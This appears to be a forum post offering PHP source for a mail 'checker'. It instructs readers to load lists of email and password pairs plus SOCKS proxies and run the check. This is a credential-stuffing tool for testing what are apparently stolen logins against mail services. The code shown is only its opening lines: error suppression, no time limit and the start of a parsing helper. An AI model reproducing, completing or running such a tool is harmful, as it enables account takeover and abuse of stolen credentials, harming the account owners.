Source can run on localhost, hosting...
Save as php file and fill list mail pass, socks and press CHECK NOW
Source
<?
ini_set("display_errors",0);
@set_time_limit(0);
if(isset($_GET['check']))
{
function getStr($string,$start,$end){
$str = explode($start,$string,2);
$str =...